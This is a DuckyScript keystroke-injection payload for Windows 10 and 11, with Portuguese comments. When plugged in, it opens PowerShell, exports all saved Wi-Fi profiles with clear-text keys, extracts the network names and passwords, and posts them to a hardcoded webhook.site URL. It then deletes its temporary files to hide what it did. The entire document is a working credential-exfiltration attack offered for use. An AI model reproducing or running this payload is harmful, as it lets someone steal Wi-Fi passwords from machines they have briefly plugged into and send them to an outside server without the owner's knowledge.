REM ###################################################################
REM #                                                                 |
REM # Title        : WLAN-Windows-Passwords-to-WebHook                |
REM # Author       : Uno                                              |
REM # Description: Send wifi PWD to https://webhook.site/75342571-78da-45fc-8f61-caf01ffc1f5f
REM # Category     : Credentials                                      |
REM # Target       : Windows 10-11                                    |
REM # Version      : 1.0                                              |
REM #                                                                 |
REM ###################################################################

REM *************** ABRE POWER SHELL  *****************
DELAY 250
GUI r
DELAY 250
STRING powershell
ENTER
DELAY 1500
REM *************** ABRE POWER SHELL *****************
REM ***************** EXECUTA O ENVIO DAS SENHAS *********************
STRING $p="$env:TEMP\p";md $p -f|Out-Null;cd $p;netsh wlan export profile key=clear|Out-Null;$r=ls *.xml|%{$x=[xml](gc $_.FullName -ea 0);if($x.WLANProfile.Name -and $x.WLANProfile.MSM.Security.SharedKey.KeyMaterial){[PSCustomObject]@{S=$x.WLANProfile.Name;P=$x.WLANProfile.MSM.Security.SharedKey.KeyMaterial}}};$f=($r|%{"$($_.S)>>$($_.P)"}) -join "`n";$c="r`n$f`n``````";$b=[Text.Encoding]::UTF8.GetBytes($c);if($b){irm https://webhook.site/75342571-78da-45fc-8f61-caf01ffc1f5f -me Post -bo $b -con 'text/plain; charset=utf-8' -ea 0};cd ..;rm $p -r -fo -ea 0;exit
ENTER
